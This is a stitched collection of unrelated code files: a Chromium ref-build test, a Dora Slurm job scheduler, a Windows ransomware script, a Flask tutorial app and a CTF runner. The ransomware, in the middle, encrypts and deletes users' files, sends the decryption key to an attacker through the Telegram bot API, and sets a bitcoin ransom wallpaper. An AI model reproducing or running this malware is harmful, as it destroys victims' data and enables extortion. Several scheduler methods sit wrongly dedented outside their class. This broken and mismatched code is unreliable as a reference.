    def testInit(self):
        # Stub classmethods used to monkeypatch BuildUpdater below.
        @classmethod
        def EmptyVersions(_):
            return {}
        @classmethod
        def AllOmahaVersion1(_):
            return {'mac':'1', 'linux':'1', 'win':'1'}
        @classmethod
        def AllCurrentVersion1(_):
            return {'Mac':'1', 'Linux':'1', 'Linux_x64':'1', 'Win':'1'}
        @classmethod
        def MixedOmahaVersion23(_):
            return {'mac':'2', 'linux':'3', 'win':'2'}
        @classmethod
        def MissingOmahaVersion(_):
            return {'mac':'2', 'win':'1'}
        # Save the real classmethods so the finally-block can restore them
        # and leave other tests unaffected.
        old_stable = update_ref_build.BuildUpdater._OmahaVersionsMap
        old_current = update_ref_build.BuildUpdater._CurrentRefBuildsMap
        try:
            # No current ref builds: every Omaha platform needs an update.
            update_ref_build.BuildUpdater._CurrentRefBuildsMap = EmptyVersions
            update_ref_build.BuildUpdater._OmahaVersionsMap = AllOmahaVersion1
            expected_versions = {'Mac':'1', 'Linux':'1', 'Linux_x64':'1', 'Win':'1'}
            b = update_ref_build.BuildUpdater()
            self.assertEqual(expected_versions, b._platform_to_version_map)
            # A platform missing from Omaha is dropped from the map.
            update_ref_build.BuildUpdater._OmahaVersionsMap = MissingOmahaVersion
            expected_versions = {'Mac':'2', 'Win':'1'}
            b = update_ref_build.BuildUpdater()
            self.assertEqual(expected_versions, b._platform_to_version_map)
            # Platforms already at the current ref version are filtered out.
            update_ref_build.BuildUpdater._CurrentRefBuildsMap = AllCurrentVersion1
            expected_versions = {'Mac':'2'}
            b = update_ref_build.BuildUpdater()
            self.assertEqual(expected_versions, b._platform_to_version_map)
            # Linux_x64 mirrors the 'linux' Omaha version.
            update_ref_build.BuildUpdater._OmahaVersionsMap = MixedOmahaVersion23
            expected_versions = {'Mac':'2', 'Linux':'3', 'Linux_x64':'3', 'Win':'2'}
            b = update_ref_build.BuildUpdater()
            self.assertEqual(expected_versions, b._platform_to_version_map)
        finally:
            update_ref_build.BuildUpdater._OmahaVersionsMap = old_stable
            update_ref_build.BuildUpdater._CurrentRefBuildsMap = old_current
    def testOmahaVersions(self):
        #This is an example of valid output from the _OmahaReport function.
        #Taken from processing the omaha report on 3/18/15
        lines = [['os', 'channel', 'current_version', 'previous_version',
                  'current_reldate', 'previous_reldate', 'branch_base_commit',
                  'branch_base_position', 'branch_commit', 'base_webkit_position',
                  'true_branch', 'v8_version\n'],
                 ['win', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
                  '03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
                  'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
                  '4.1.0.21\n'],
                 ['mac', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
                  '03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
                  'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
                  '4.1.0.21\n'],
                 ['linux', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
                  '03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
                  'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
                  '4.1.0.21\n'],
                 ['cros', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
                  '03/04/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
                  'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177', 'master',
                  '4.1.0.21\n'],
                 ['android', 'stable', '41.0.2272.94', '40.0.2214.109', '03/18/15',
                  '02/04/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4', '310958',
                  '70c994cb9b14e4c6934654aaa7089b4b2e8f7788', '188177', '2272',
                  '4.1.0.21\n'],
                 ['ios', 'stable', '41.0.2272.56', '40.0.2214.73', '03/16/15',
                  '02/18/15', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A\n']]
        # GetLines closes over the local `lines`, so rebinding `lines`
        # below changes what the stubbed _OmahaReport returns.
        @classmethod
        def GetLines(_):
            return lines
        old_omaha_report = update_ref_build.BuildUpdater._OmahaReport
        update_ref_build.BuildUpdater._OmahaReport = GetLines
        expected_versions = {'win':'41.0.2272.89', 'mac':'41.0.2272.89',
                             'linux':'41.0.2272.89'}
        b = update_ref_build.BuildUpdater()
        try:
            versions = b._OmahaVersionsMap()
            self.assertEqual(expected_versions, versions)
            # A report missing required platforms must raise.
            lines = [['os', 'channel', 'current_version', 'previous_version',
                      'current_reldate', 'previous_reldate', 'branch_base_commit',
                      'branch_base_position', 'branch_commit', 'base_webkit_position',
                      'true_branch', 'v8_version\n'],
                     ['win', 'stable', '41.0.2272.89', '41.0.2272.76', '03/10/15',
                      '03/03/15', '827a380cfdb31aa54c8d56e63ce2c3fd8c3ba4d4',
                      '310958', 'a4d5695040a99b9b2cb196eb5b898383a274376e', '188177',
                      'master', '4.1.0.21\n']]
            self.assertRaises(ValueError, b._OmahaVersionsMap)
            # Malformed and empty reports must raise as well.
            lines = ['random', 'list', 'of', 'strings']
            self.assertRaises(ValueError, b._OmahaVersionsMap)
            lines = []
            self.assertRaises(ValueError, b._OmahaVersionsMap)
        finally:
            update_ref_build.BuildUpdater._OmahaReport = old_omaha_report
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Scheduling and job monitoring utilities.
"""
from contextlib import contextmanager, ExitStack
from dataclasses import dataclass, field
import logging
from pathlib import Path
import pickle
import os
import subprocess as sp
import sys
import typing as tp
from submitit import SlurmJob
import submitit
from . import git_save
from .conf import SlurmConfig, SubmitRules
from .distrib import get_distrib_spec
from .main import DecoratedMain
from .utils import try_load
from .xp import XP, _get_sig
logger = logging.getLogger(__name__)
class _SubmitItTarget:
    """Picklable callable handed to submitit; re-runs the decorated main."""
    def __call__(self, main: DecoratedMain, argv: tp.Sequence[str]):
        # Resolve the XP from argv, then emulate a command-line invocation
        # of `main` by rewriting sys.argv in place.
        self.xp = main.get_xp(argv)
        sys.argv[1:] = argv
        main()
    def checkpoint(self, *args, **kwargs):
        # Called by submitit on preemption/timeout to requeue the job.
        if get_distrib_spec().rank == 0:
            # cleanup rendezvous file on requeue, otherwise things will fail.
            if self.xp.rendezvous_file.exists():
                self.xp.rendezvous_file.unlink()
        return submitit.helpers.DelayedSubmission(self, *args, **kwargs)
class Sheep:
    """
    A Sheep is a specific run for a given XP. Sheeps are managed
    by the Shepherd.

    Args:
        xp: the experiment this sheep tracks.
        job: optional already-known Slurm job for this XP. Previously this
            argument was silently ignored; it is now used as the initial
            job, although a job recorded in the XP's job file still takes
            precedence.
    """
    def __init__(self, xp: XP, job: SlurmJob = None):
        self.xp = xp
        # Fix: honor the `job` argument instead of discarding it.
        self.job: tp.Optional[submitit.SlurmJob] = job
        # Other jobs contain the list of other jobs in the array
        self._other_jobs: tp.Optional[tp.List[submitit.SlurmJob]] = None
        if self._job_file.exists():
            content = try_load(self._job_file)
            if isinstance(content, tuple):
                self.job, self._other_jobs = content
            else:
                self.job = content

    @property
    def _job_file(self) -> Path:
        # Location of the persisted job (or (job, other_jobs) tuple).
        return self.xp.folder / self.xp.dora.shep.job_file

    def state(self, mode="standard"):
        """Return the current state of the `Sheep`, or None if it was
        never submitted.
        """
        if self.job is None:
            return None
        state = self.job.watcher.get_state(self.job.job_id, mode)
        if state == 'UNKNOWN' and self._other_jobs:
            if any(job.state != 'UNKNOWN' for job in self._other_jobs):
                # When cancelling single entries in a job array,
                # sacct will just completely forget about it instead of marking
                # it as cancelled. So we use a specific 'MISSING' status to handle that.
                state = 'MISSING'
        # Collapse the various 'CANCELLED...' variants to a single value.
        if state.startswith('CANCELLED'):
            return 'CANCELLED'
        return state

    def is_done(self, mode="standard"):
        """Return True if the job is no longer running on the cluster.
        """
        if self.job is None:
            return True
        return self.job.watcher.is_done(self.job.job_id, mode)

    @property
    def log(self):
        """Return the path to the main log, or None if never submitted.
        """
        if self.job is not None:
            return self.xp.submitit / f"{self.job.job_id}_0_log.out"
        return None

    def __repr__(self):
        out = f"Sheep({self.xp.sig}, state={self.state()}, "
        if self.job is not None:
            out += f"sid={self.job.job_id}, "
        out += f"argv={self.xp.argv})"
        return out
def no_log(x: str):
    """Do-nothing logging callback, used as `Shepherd`'s default logger."""
    return None
@dataclass
class _JobArray:
    # One pending Slurm job array: every sheep in it shares this config.
    slurm_config: SlurmConfig
    sheeps: tp.List[Sheep] = field(default_factory=list)
class Shepherd:
"""
Takes care of the little jobs.
Args:
main (DecoratedMain): main function decorated by Dora.
log (callable): log function, if provided should take a single string
argument.
"""
    def __init__(self, main: DecoratedMain, log: tp.Callable[[str], None] = no_log):
        self.main = main
        # Make sure the bookkeeping folders exist before anything else.
        self._by_id.mkdir(exist_ok=True, parents=True)
        self._orphans.mkdir(exist_ok=True, parents=True)
        self._arrays.mkdir(exist_ok=True, parents=True)
        self.log = log
        self._in_job_array: bool = False
        self._existing_git_clone: tp.Optional[Path] = None
        # Pending operations, applied when commit() is called.
        self._to_cancel: tp.List[submitit.SlurmJob] = []
        self._to_submit: tp.List[_JobArray] = []
        self._check_orphans()
    def get_sheep_from_argv(self, argv: tp.Sequence[str]) -> Sheep:
        """
        Given a list of arguments, return the matching `Sheep`,
        which will contain both information on the `dora.xp.XP`, and on
        the latest job associated with that XP.
        """
        # A plain string would be silently iterated char by char; forbid it.
        assert not isinstance(argv, str)
        xp = self.main.get_xp(argv)
        return Sheep(xp)
    def get_sheep_from_sig(self, sig: str) -> tp.Optional[Sheep]:
        """
        Returns a `Sheep` given the XP signature, if any exists, otherwise
        returns None.
        """
        # NOTE(review): a Sheep is returned unconditionally here; the
        # "otherwise None" contract relies on get_xp_from_sig signaling a
        # missing signature (e.g. by raising) — confirm in DecoratedMain.
        xp = self.main.get_xp_from_sig(sig)
        return Sheep(xp)
    def get_sheep_from_job_id(self, job_id: str) -> tp.Optional[Sheep]:
        """
        Returns the `Sheep` associated with the given `job_id`. If no sheep
        is found, returns None.
        """
        # The _by_id folder holds one symlink per job id, pointing at the
        # XP folder whose name is the XP signature.
        link = self._by_id / job_id
        if link.is_symlink():
            sig = link.resolve().name
            xp = self.main.get_xp_from_sig(sig)
            return Sheep(xp)
        return None
    def update(self):
        """
        Force an update of all job states with submitit.
        """
        # The watcher is shared at the class level, so this refreshes the
        # state cache used by every Sheep.
        SlurmJob.watcher.update()
    @contextmanager
    def job_array(self, slurm_config: SlurmConfig):
        """Context manager to launch XP in job array."""
        # Nested job arrays are not supported.
        assert not self._in_job_array
        # Sheeps registered while inside the context all join this array.
        self._to_submit.append(_JobArray(slurm_config))
        self._in_job_array = True
        try:
            yield
        finally:
            self._in_job_array = False
    def maybe_submit_lazy(self, sheep: Sheep, slurm_config: SlurmConfig, rules: SubmitRules):
        """
        Decides whether to schedule a new job for the given sheep, based on the rules
        given in `rules`.
        Jobs are actually only scheduled once the `commit()` method is called.
        """
        if sheep.job is not None:
            state = sheep.state()
            if state == 'COMPLETED':
                if rules.replace_done:
                    logger.debug(f"Ignoring previously completed job {sheep.job.job_id}")
                    sheep.job = None
            elif state in ["FAILED", "CANCELLED", "OUT_OF_MEMORY", "TIMEOUT", "MISSING"]:
                logger.debug(f"Previous job {sheep.job.job_id} failed or was canceled")
                if rules.retry:
                    sheep.job = None
            else:
                # Any other state (e.g. still queued or running).
                if rules.replace:
                    logger.debug(f"Cancelling previous job {sheep.job.job_id} with status {state}")
                    self.cancel_lazy(sheep.job)
                    sheep.job = None
        if sheep.job is None:
            # Outside a job_array() context each sheep gets its own
            # single-entry array; inside one, all configs must match.
            if not self._in_job_array:
                self._to_submit.append(_JobArray(slurm_config))
            assert slurm_config == self._to_submit[-1].slurm_config
            self._to_submit[-1].sheeps.append(sheep)
def cancel_lazy(self, job: submitit.SlurmJob):
    """
    Cancel a job. The job is actually cancelled only when `commit()` is called.
    """
    self._to_cancel.append(job)
def commit(self):
    """Apply every change registered so far with `maybe_submit_lazy()`
    and `cancel_lazy()`: pending cancellations first, then submissions."""
    if self._to_cancel:
        self._cancel(self._to_cancel)
        self._to_cancel = []
    self._existing_git_clone = None
    # Drain the submission queue in FIFO order.
    while self._to_submit:
        self._submit(self._to_submit.pop(0))
@property
def _by_id(self) -> Path:
    # Folder of symlinks mapping Slurm job ids to XP folders.
    return self.main.dora.dir / self.main.dora.shep.by_id
@property
def _orphans(self) -> Path:
    # Folder of "dirty" tags marking submissions whose job id may not
    # have been saved (see `_check_orphans` / `_enter_orphan`).
    return self.main.dora.dir / self.main.dora.shep.orphans
@property
def _arrays(self) -> Path:
    # Folder holding the submitit folders of job arrays.
    return self.main.dora.dir / self.main.dora.shep.arrays
def _cancel(self, jobs: tp.List[SlurmJob]):
    """Immediately cancel the given jobs with a single `scancel` call."""
    command = ["scancel", *(job.job_id for job in jobs)]
    logger.debug("Running %s", " ".join(command))
    sp.run(command, check=True)
def _get_submitit_executor(self, name: str, folder: Path,
                           slurm_config: SlurmConfig) -> submitit.SlurmExecutor:
    """Build a submitit SlurmExecutor from `slurm_config`.

    Translates the Dora-level config (gpus, mem_per_gpu, cpus_per_gpu,
    one_task_per_node) into raw Slurm parameters (nodes, ntasks_per_node,
    gpus_per_task, cpus_per_task, mem), forwarding every other field of
    `slurm_config` untouched.
    """
    os.environ['SLURM_KILL_BAD_EXIT'] = '1'  # Kill the job if any of the task fails
    # Start from a copy of all config fields; Dora-specific keys are
    # popped/deleted below, the rest go straight to submitit.
    kwargs = dict(slurm_config.__dict__)
    executor = submitit.SlurmExecutor(
        folder=folder, max_num_timeout=kwargs.pop('max_num_timeout'))
    gpus = slurm_config.gpus
    if gpus > 8:
        # More than 8 GPUs means multi-node, with 8 GPUs per node.
        if gpus % 8 != 0:
            raise ValueError("Can only take <= 8 gpus, or multiple of 8 gpus")
        kwargs['nodes'] = gpus // 8
        gpus_per_node = 8
    else:
        gpus_per_node = gpus
        kwargs['nodes'] = 1
    # Memory is requested per node, derived from the per-GPU budget.
    mem = slurm_config.mem_per_gpu * gpus_per_node
    kwargs['mem'] = f"{mem}GB"
    if slurm_config.one_task_per_node:
        # One task owns all the GPUs of its node.
        kwargs['gpus_per_task'] = gpus_per_node
        kwargs['ntasks_per_node'] = 1
        if slurm_config.cpus_per_task is None:
            kwargs['cpus_per_task'] = gpus_per_node * slurm_config.cpus_per_gpu
    else:
        # One task per GPU.
        kwargs['gpus_per_task'] = 1
        kwargs['ntasks_per_node'] = gpus_per_node
        if slurm_config.cpus_per_task is None:
            kwargs['cpus_per_task'] = slurm_config.cpus_per_gpu
    # Remove the Dora-level fields that were translated above.
    del kwargs['gpus']
    del kwargs['mem_per_gpu']
    del kwargs['cpus_per_gpu']
    del kwargs['one_task_per_node']
    logger.debug("Slurm parameters %r", kwargs)
    executor.update_parameters(
        job_name=name,
        stderr_to_stdout=True,
        **kwargs)
    return executor
def _check_orphans(self):
    """Detect and clean up orphaned jobs.

    A leftover tag in the orphans folder means a previous submission may
    have crashed between scheduling and saving the job id; any matching
    queued job is cancelled and the tag removed.
    """
    for tag_file in self._orphans.iterdir():
        name = tag_file.name
        logger.warning(f"Found dirty tag {name}, meaning a job might have been scheduled "
                       "but Dora or Slurm crashed before the job id was saved.")
        # Ask Slurm for any job of ours still queued under that name.
        proc = sp.run(["squeue", "-u", os.getlogin(), "-n", name, "-o", "%i", "-h"],
                      capture_output=True, check=True)
        ids = list(filter(None, proc.stdout.decode().strip().split("\n")))
        if ids:
            logger.warning(f"Found orphan job ids {ids}, will cancel")
            sp.run(["scancel", *ids], check=True)
        tag_file.unlink()
@contextmanager
def _enter_orphan(self, name: str):
    """Mark `name` as a potential orphan for the duration of the context.

    The tag file survives a hard crash inside the context, letting
    `_check_orphans` find and cancel jobs whose ids were never saved.
    """
    marker = self._orphans / name
    marker.touch()
    try:
        yield
    finally:
        marker.unlink()
def _submit(self, job_array: _JobArray):
    """Actually schedule all the sheeps of `job_array` with submitit.

    Initializes each XP, submits everything (batched when the array has
    more than one sheep), then persists the job ids and symlinks before
    the orphan tag is released.
    """
    sheeps = job_array.sheeps
    slurm_config = job_array.slurm_config
    if not sheeps:
        return
    is_array = len(sheeps) > 1
    first = sheeps[0]
    self.main.init_xp(first.xp)
    use_git_save = first.xp.dora.git_save
    # FIX: the assert message previously ended with a stray `""` implicit
    # concatenation (`."""`), a harmless but confusing typo.
    assert all(other.xp.dora.git_save == use_git_save for other in sheeps), \
        "All jobs inside an array must have the same value for git_save."
    # Arrays are named after the signature of the sorted sheep signatures,
    # single jobs after the XP signature itself.
    if is_array:
        name_sig = _get_sig(sorted([sheep.xp.sig for sheep in sheeps]))
    else:
        name_sig = first.xp.sig
    if is_array:
        name = self.main.name + "_array_" + name_sig
    else:
        name = self.main.name + "_" + name_sig
    if is_array:
        submitit_folder = self._arrays / name
    else:
        submitit_folder = first.xp._xp_submitit
    submitit_folder.mkdir(exist_ok=True)
    for sheep in sheeps:
        xp = sheep.xp
        self.main.init_xp(xp)
        # Stale rendezvous files would confuse the new run.
        if xp.rendezvous_file.exists():
            xp.rendezvous_file.unlink()
    executor = self._get_submitit_executor(name, submitit_folder, slurm_config)
    jobs: tp.List[submitit.Job] = []
    if use_git_save and self._existing_git_clone is None:
        self._existing_git_clone = git_save.get_new_clone(self.main.dora)
    # The orphan tag protects us until the job ids below are saved.
    with self._enter_orphan(name):
        with ExitStack() as stack:
            if use_git_save:
                assert self._existing_git_clone is not None
                stack.enter_context(git_save.enter_clone(self._existing_git_clone))
            if is_array:
                stack.enter_context(executor.batch())
            for sheep in job_array.sheeps:
                if use_git_save:
                    assert self._existing_git_clone is not None
                    git_save.assign_clone(sheep.xp, self._existing_git_clone)
                jobs.append(executor.submit(_SubmitItTarget(), self.main, sheep.xp.argv))
        # Now we can access jobs
        for sheep, job in zip(sheeps, jobs):
            # See commment in `Sheep.state` function above for storing all jobs in the array.
            # FIX: close the job file deterministically instead of leaking
            # the handle from `pickle.dump((job, jobs), open(...))`.
            with open(sheep._job_file, "wb") as job_file:
                pickle.dump((job, jobs), job_file)
            logger.debug("Created job with id %s", job.job_id)
            sheep.job = job  # type: ignore
            sheep._other_jobs = jobs  # type: ignore
            # FIX: removed dead no-op assignment `link = link`.
            link = self._by_id / job.job_id
            link.symlink_to(sheep.xp.folder.resolve())
            if is_array:
                # We link the array submitit folder to be sure
                # we keep an history of all arrays the XP was in.
                submitit_link = (sheep.xp.folder / submitit_folder.name)
                if submitit_link.exists():
                    assert submitit_link.resolve() == submitit_folder.resolve()
                else:
                    submitit_link.symlink_to(submitit_folder)
                latest = sheep.xp._latest_submitit
                if latest.exists():
                    latest.unlink()
                latest.symlink_to(submitit_folder)
            name = self.main.get_name(sheep.xp)
            self.log(f"Scheduled job {job.job_id} for sheep {sheep.xp.sig}/{name}")
|
#!/usr/bin/python3
import threading, ctypes, pathlib
import cryptography, os, requests, sys
from PIL import Image, ImageDraw, ImageFont
from win32api import GetSystemMetrics
from cryptography.fernet import Fernet
from tkinter import messagebox
from time import sleep
class D_E_ncrypt(object): # Encrypter Class (Our main Class )
def __init__(self, Target=0, FernetM=0, Url=0):
self.Target = Target # File Path
self.FernetM = FernetM # Our Fernet Moudle
self.Url = Url # Our Api Url in my case Telegram
def FileE(loc): # We Pass File Name And Path In Hare In Order To Encrypt Them
try: # Run Try/Except So We Dont Run in to Error
if (os.path.isdir(loc.Target) != True) : # Cheak If Its File not Directory
with open(loc.Target, "rb") as File: # Opeing File
Date = File.read() # Reading File & Saving it In tmp Var
FileName = loc.Target # File name
Encrypted = loc.FernetM.encrypt(Date) # Encrypting tmp Var
if(loc.Target != sys.argv[0]): # If Target File is not Our own script Do this
with open(f"{FileName}.lol","wb") as File: # Opeing File To write File
print(f"FILE -> {FileName}") # Printing File name for batter Debug
File.write(Encrypted) # Writeing The File
os.remove(loc.Target) # Removing OG File
except Exception as e:print(f"Error -> {e}")
def SendKey(Key): # We Pass Decrypt Key and Api url To Make Get request
requests.get(Key.Url) # We send request
User = os.getlogin() # Getting Username
Script = sys.argv[0] # Getting Our Script name
MaxThread = 120 # Setting up Our max Number of Thread
AdminRight = ctypes.windll.shell32.IsUserAnAdmin() # Cheaking for admin Perms
Key = Fernet.generate_key() # Making A key IN order to D/Encypt with it
FKey = Fernet(Key) # Our Fernet Moudle
Token = "Your Telegram Token So you can Get Decrypt The Files!" # Our Api Token
NumID = "Your User ID so Bot just Send Key To You !" # Our User ID
Message = (f"{User} -> {Key}") # Makeing Prefix for Massges
PathList = [ f"c:\\Users",f"c:\\Users\\{User}\\Desktop", # Our System Path list to Look For
f"c:\\Users\\{User}\\Pictures", # Date To Encrypt .
f"c:\\Users\\{User}\\Documents",
f"c:\\Users\\{User}\\Music",
f"c:\\Users\\{User}\\Downloads", os.getcwd()]
for Latter in range(97,123): (PathList.append(f"{chr(Latter)}:\\")) # Making list of A,Z in order to pass as Drive
PathList.pop(8) # Removing C Drive
print(f"We are -> {Script}") # Remove This line this is just for Debuging
print(f"Key - > {Key}") # Remove This line this is just for Debuging
def OneStart():
try: # Run Try/Except So We Dont Run in to Error
HttpReq = D_E_ncrypt(Url=f"https://api.telegram.org/bot{Token}/sendMessage?chat_id={NumID}&text={Message}")
threading.Thread(target=HttpReq.SendKey, args=()).start() # Making HttpReq Moudle And Runnig it In a Thread
Img = Image.new('RGB', (GetSystemMetrics(0), GetSystemMetrics(1)), color = (0, 0, 0)) # Getting Window Heihgt & Weight To Make Background
Canvas= ImageDraw.Draw(Img) # Drawing Image
font = ImageFont.truetype("arial", int(GetSystemMetrics(1)/20)) # Getting Right Font Size
Canvas.text(
(10,10), (r"""
Your data Is encrypted In order to Get your
> date back Send me (YOUR PRICE USD) in BTC to this Wellt
> and then email me for your key
> YOUR WELLET
> GoodLuck :)
> ~ YOUR NAME """),
fill=(255,0,0),font=font) # Write Text On Image
Img.save('Bg.png') # Save Image as bg.png
ctypes.windll.user32.SystemParametersInfoW(20, 0, f'{os.getcwd()}\\Bg.png' , 0) # Set New Background Up
except:pass
def CallErrorBox(): # Making Simple Error Box in Tk
WINDOW = tkinter.Tk() # Making Tk Window
WINDOW.withdraw() # Destroying Tk Window
messagebox.showerror("Error", "Try To Re-Run As Administrator")
if __name__ == '__main__': # Check IF Script IS Excuted By User.
if(AdminRight): # Check IF Script Have Admin Access
OneStart() # Run On start Def To Send HttpReq
for AllFiles in PathList:
try: # Run Try/Except So We Dont Run in to Error & background
if (pathlib.Path(AllFiles).exists()): # Cheak if Path Exist
for path, subdirs, files in os.walk(AllFiles): # For All Drives & Files
if("$Recycle.Bin" in path): # Skip Junks
pass
elif("c:\\Windows" in path): # Skip c:\\Windows
pass
elif("System32" in path): # Skip System32
pass
else: # After That
for name in files: # For Files in Folder
FilePath = os.path.join(path, name) # Join File path to File Name
FileSize = os.stat(FilePath).st_size # Get The File Size
if(".dll" in name ): # Skip This File Format
pass
elif(".exe" in name ): # Skip This File Format
pass
elif(".msn" in name ): # Skip This File Format
pass
else :
if (FileSize >= 50000000 ): # If File size is More then 50mb make Thread for this file
while True: # Make While Ture
if len(threading.enumerate()) < MaxThread: # IF your Worker List is Free
EncrypterObj = D_E_ncrypt(FilePath, FKey) # Pass in file name And key
threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypte.
break # Break Out
else: sleep(0.2) # Sleep for 0.2 Sec Until Spot Get Free
else :
print(FilePath) # Remove This line this is just for Debuging
D_E_ncrypt(FilePath, FKey).FileE() # Pass In File Name And key
except Exception as e:print(f"Error -> {e}") # remove Print And Replace Ut With Pass
else:
CallErrorBox() # Call Error Box
|
# let's import the flask
from flask import Flask, render_template, request, redirect, url_for
import os # importing operating system module
app = Flask(__name__)
# Disable caching of static files: a max-age of 0 makes the browser
# re-fetch CSS/JS on every request, so edits show up immediately.
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
@app.route('/')  # home route
def home():
    """Render the landing page with the site name and the tech stack list."""
    context = {
        'techs': ['HTML', 'CSS', 'Flask', 'Python'],
        'name': '30 Days Of Python Programming',
        'title': 'Home',
    }
    return render_template('home.html', **context)
@app.route('/about')
def about():
    """Render the about page."""
    return render_template('about.html',
                           name='30 Days Of Python Programming',
                           title='About Us')
@app.route('/result')
def result():
    # Target of the redirect issued by the `post` view below.
    return render_template('result.html')
@app.route('/post', methods=['GET', 'POST'])
def post():
    """Serve the text-analyzer form (GET) and accept its submission (POST)."""
    name = 'Text Analyzer'
    if request.method == 'POST':
        # NOTE(review): `content` is read but never used or forwarded —
        # presumably the analysis should happen here; confirm intent.
        # The lookup itself enforces that the form field is present.
        content = request.form['content']
        return redirect(url_for('result'))
    if request.method == 'GET':
        return render_template('post.html', name=name, title=name)
if __name__ == '__main__':
    # Read the port from the environment so the app works both locally
    # (default 5000) and on a hosting platform that injects PORT.
    port = int(os.environ.get("PORT", 5000))
    # NOTE(review): debug=True enables the interactive debugger and should
    # be turned off for a real production deployment — confirm.
    app.run(debug=True, host='0.0.0.0', port=port)
|
#!/usr/bin/python3
import sys
import os
import binascii
import re
import subprocess
import signal
def handler(x, y):
    # SIGALRM handler: abort the whole process with exit code -1.
    sys.exit(-1)
# Hard 30-second wall-clock limit for the entire challenge run.
signal.signal(signal.SIGALRM, handler)
signal.alarm(30)
def gen_filename():
    """Return an unpredictable path under /tmp (32 random hex characters)."""
    token = binascii.hexlify(os.urandom(16)).decode('utf-8')
    return '/tmp/' + token
# Marker word that terminates the submitted source code on stdin.
EOF = 'zh3r0-CTF'
# Maximum number of bytes of source code accepted.
MAX_SIZE = 10000
def main():
    """Read JS source from stdin, save it to a random /tmp file, run it.

    Input ends at the `EOF` marker word (or at stream end). Returns False
    when more than MAX_SIZE bytes are received; otherwise writes the code
    to a fresh temp file, closes stdout/stderr, and hands the file to
    ./run.sh.
    """
    print(f'Give me the source code(size < {MAX_SIZE}). EOF word is `{EOF}\'')
    sys.stdout.flush()
    size = 0
    code = ''
    while True:
        s = sys.stdin.readline()
        # FIX: on stream EOF readline() returns '' forever; the original
        # loop spun until the 30s alarm fired. Stop reading instead.
        if not s:
            break
        size += len(s)
        if size > MAX_SIZE:
            print('too long')
            sys.stdout.flush()
            return False
        idx = s.find(EOF)
        if idx < 0:
            code += s
        else:
            # Keep only the text before the marker, then stop.
            code += s[:idx]
            break
    filename = gen_filename() + ".js"
    with open(filename, 'w') as f:
        f.write(code)
    # Silence the sandboxed program: close stdout and stderr.
    os.close(1)
    os.close(2)
    # FIX: the command contained a corrupted placeholder instead of the
    # temp file path; pass the actual filename (urandom hex, shell-safe).
    os.system(f'./run.sh {filename}')
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.